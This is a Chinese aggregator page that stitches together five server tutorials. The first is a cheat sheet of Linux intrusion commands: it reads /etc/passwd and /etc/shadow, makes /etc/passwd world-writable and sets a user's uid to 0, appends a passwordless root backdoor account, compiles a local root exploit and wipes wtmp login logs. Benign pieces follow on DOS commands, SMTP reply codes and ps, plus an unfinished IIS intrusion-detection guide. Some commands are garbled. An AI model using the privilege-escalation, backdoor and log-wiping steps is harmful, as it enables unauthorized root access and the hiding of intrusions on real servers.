linux入侵常用命令服务器教程

“我样帅我低调”通过精心收集，向本站投稿了5篇linux入侵常用命令服务器教程，以下是小编收集整理后的linux入侵常用命令服务器教程，仅供参考，希望对大家有所帮助。

篇1：linux入侵常用命令服务器教程

cat /etc/passwd 查看linux用户cat /etc/shadow 查看用户密码需要root权限

cat /etc/passwd 查看linux用户

cat /etc/shadow 查看用户密码需要root权限

cat /etc/sysconfig/network-scripts/ifcfg-ethn  N代表网卡号 查看所在网卡的ip信息

ifconfig 查看本机ip信息

cat /etc/resolv.conf 查看DNS信息

bash -i 在反弹的shell中使用可以直观显示命令

bash prompt: 当你以普通限权用户身份进入的时候，一般你会有一个类似bash$的prompt，当你以Root登陆时，你的prompt会变成

bash#。

系统变量 : 试着echo “$USER / $EUID” 系统应该会告诉你它认为你是什么用户。

echo 1>/proc/sys/net/ipv4/if_forward是不是你写错了,应该是echo 1>/proc/sys/net/ipv4/ip_forward,

vim /proc/sys/net/ipv4/ip_forward 吧,默认是0,也就是内核不进行数据包过滤,改为1 ,让内核对数据包进行filter处理!

netstat -an grep LISTEN grep :80 查看端口

service --status-all grep running

service --status-all grep http

查看运行服务

lsb_release -a  查看系统版本

重启ssh服务 ：/usr/sbin/sshd stop

/usr/sbin/sshd start

ssd_config文件里

PasswordAuthentication no,

将其改为

PasswordAuthentication yes

远程ssh才可登录

否则显示Access denied

其中Usepam yes可能用来建立pam方式login，比如从其它linux主机ssh到服务端，如果关闭，则不能打开.

su的菜鸟用法

先chomod 777 /etc/passwd

然后修改bin用户的gid和uid为0

然后passwd设置bin的密码

然后cp /bin/bash /sbin/nologin

然后su的时候su - bin就可以到rootshell了，

这个原理就是当ssh不允许root用ssh终端登陆的时候，我们又不知道root密码，的一种很菜鸟的做法

还可以这样

sed -i s/bin:x:1:1/bin:x:0:1/g /etc/passwd

gcc prtcl2.c –o local –static –Wall

echo “nosec:x:0:0::/:/bin/sh” >>/etc/passwd

echo “nosec::-1:-1:-1:-1:-1:-1:500” >>/etc/shadow

清空last记录 cp /dev/null /var/log/wtmp

-----

dd if=/dev/zero f=yourfile bs=10M count=10 建立一个100m的大文件在利用Linux Kernel <= 2.6.17.4 (proc) Local Root Exploit提权的时候要用到的。

篇2：DOS命令全集(第三讲)服务器教程

（六）TREE――显示磁盘目录结构命令

1．功能：显示指定驱动器上所有目录路径和这些目录下的所有文件名，

2．类型：外部命令

3．格式：TREE[盘符：][/F][》PRN]

4．使用说明：

（1）使用/F参数时显示所有目录及目录下的所有文件，省略时，只显示目录，不显示目录下的文件；

（2）选用＞PRN参数时，则把所列目录及目录中的文件名打印输出，

（七）DELTREE――删除整个目录命令

1．功能：将整个目录及其下属子目录和文件删除。

2．类型：外部命令

3．格式：DELTREE[盘符：]〈路径名〉

4．使用说明：该命令可以一步就将目录及其下的所有文件、子目录、更下层的子目录一并删除，而且不管文件的属性为隐藏、系统或只读，只要该文件位于删除的目录之下，DELTREE都一视同仁，照删不误。使用时务必小心！！！

篇3：SMTP协议的命令和应答服务器教程

从前面的通讯模型可以看出SMTP协议在发送SMTP和接收SMTP之间的会话是靠发送SMTP的SMTP命令和接收SMTP反馈的应答来完成的，在通讯链路建立后，发送SMTP发送MAIL命令指令邮件发送者，若接收SMTP此时可以接收邮件则作出OK的应答，然后发送SMTP继续发出RCPT命令以确认邮件是否收到，如果接收到就作出OK的应答，否则就发出拒绝接收应答，但这并不会对整个邮件操作造成影响。双方如此反复多次，直至邮件处理完毕。SMTP协议共包含10个SMTP命令，列表如下：

SMTP命令命令说明

HELLO＜domain＞＜CRLF＞识别发送方到接收SMTP的一个HELLO命令

MAILFROM:＜reverse-path＞＜CRLF＞＜reverse-path＞为发送者地址。此命令告诉接收方一个新邮件发送的开始，并对所有的状态和缓冲区进行初始化。此命令开始一个邮件传输处理，最终完成将邮件数据传送到一个或多个邮箱中。

RCPTTO:＜forward-path＞＜CRLF＞＜forward-path＞标识各个邮件接收者的地址

DATA＜CRLF＞

接收SMTP将把其后的行为看作邮件数据去处理，以＜CRLF＞.＜CRLF＞标识数据的结尾。

REST＜CRLF＞退出/复位当前的邮件传输

NOOP＜CRLF＞要求接收SMTP仅做OK应答。（用于测试）

QUIT＜CRLF＞要求接收SMTP返回一个OK应答并关闭传输。

VRFY＜string＞＜CRLF＞验证指定的邮箱是否存在，由于安全因素，服务器多禁止此命令。

EXPN＜string＞＜CRLF＞验证给定的邮箱列表是否存在，扩充邮箱列表，也常禁止使用，

HELP＜CRLF＞查询服务器支持什么命令

注：＜CRLF＞为回车、换行，ASCII码分别为13、10（十进制）。

SMTP协议的每一个命令都会返回一个应答码，应答码的每一个数字都是有特定含义的，如第一位数字为2时表示命令成功；为5表失败；3表没有完成。一些较复杂的邮件程序利用该特点，首先检查应答码的首数字，并根据其值来决定下一步的动作。下面将SMTP的应答码列表如下：

应答码说明

501参数格式错误

502命令不可实现

503错误的命令序列

504命令参数不可实现

211系统状态或系统帮助响应

214帮助信息

220＜domain＞服务就绪

221＜domain＞服务关闭

421＜domain＞服务未就绪，关闭传输信道

250要求的邮件操作完成

251用户非本地，将转发向＜forward-path＞

450要求的邮件操作未完成，邮箱不可用

550要求的邮件操作未完成，邮箱不可用

451放弃要求的操作；处理过程中出错

551用户非本地，请尝试＜forward-path＞

452系统存储不足，要求的操作未执行

552过量的存储分配，要求的操作未执行

553邮箱名不可用，要求的操作未执行

354开始邮件输入，以“.”结束

554操作失败

篇4：关于PS命令的使用详解服务器教程

详解

显示瞬间进程 (process) 的动态，使用权限是所有使用者，

关于PS命令的使用详解服务器教程

。

2.格式

[options] [--help]

3.主要参数

的参数非常多, 此出仅列出几个常用的参数。

-A：列出所有的进程。

-l：显示长列表。

-m：显示内存信息。

-w：显示加宽可以显示较多的信息，

-e：显示所有进程。

a：显示终端上的所有进程,包括其它用户的进程。

-au：显示较详细的信息。

-aux：显示所有包含其它使用者的进程。

4.说明

要对进程进行监测和控制，首先要了解当前进程的情况，也就是需要查看当前进程。ps命令就是最基本、也是非常强大的进程查看命令。使用该命令可以确定有哪些进程正在运行、运行的状态、进程是否结束、进程有没有僵尸、哪些进程占用了过多的资源等。图2给出了ps-aux命令详解。大部分信息都可以通过执行该命令得到。最常用的三个参数是u、a、x。下面就结合这三个参数详细说明ps命令的作用：ps aux

篇5：Windows 服务器入侵前兆检测方法技巧服务器教程

入侵检测系统（IDS）是防火墙的合理补充，它帮助安全系统发现可能的入侵前兆，并对付网络攻击，入侵检测系统能在不影响网络性能的情况下对网络进行监测，提供对内部攻击、外部攻击和误操作的实时保护，能够扩展系统管理员的安全管理能力（包括安全审计、监视、进攻识别和响应），提高了信息安全基础结构的完整性。但是，入侵检测系统并不是万能的，高昂的价格也让人退却，而且，单个服务器或者小型网络配置入侵检测系统或者防火墙等投入也太大了。

一、对于WWW服务入侵的前兆检测

对于网络上开放的服务器来说，WWW服务是最常见的服务之一。基于80端口的入侵也因此是最普遍的，

很多sceipt kids就对修改WEB页面非常热衷。WWW服务面对的用户多，流量相对来说都很高，同时WWW服务的漏洞和相应的入侵方法和技巧也非常多，并且也相对容易，很多“ ”使用的漏洞扫描器就能够扫描80端口的各种漏洞，比如wwwscan 、X-scanner等，甚至也有只针对80端口的漏洞扫描器。Windows系统上提供WWW服务的IIS也一直漏洞不断，成为系统管理员头疼的一部分。

虽然80端口入侵和扫描很多，但是80端口的日志记录也非常容易。IIS提供记录功能很强大的日志记录功能。在“Internet 服务管理器”中站点属性可以启用日志记录。默认情况下日志都存放在%WinDir%System32LogFiles，按照每天保存在exyymmdd.log文件中。这些都可以进行相应配置，包括日志记录的内容。

在配置IIS的时候应该让IIS日志尽量记录得尽量详细，可以帮助进行入侵判断和分析。现在我们要利用这些日志来发现入侵前兆，或者来发现服务器是否被扫描。打开日志文件，我们能够得到类似这样的扫描记录（以Unicode漏洞举例）：

【linux入侵常用命令服务器教程】相关文章：

1.Windows Server 服务器教程

2.Windows 邮件服务器全攻略服务器教程

3.Visio 教程：删除菜单或菜单命令

4.伪装nginx版本防止入侵web服务器WEB安全

5.SMTP结构及原理服务器教程

6.个人服务器架设全攻略(65)服务器教程

7.构筑自己的防火墙服务器教程

8.个人服务器架设全攻略(73)服务器教程

9.个人服务器架设全攻略(70)服务器教程

10.smtp协议手工使用服务器教程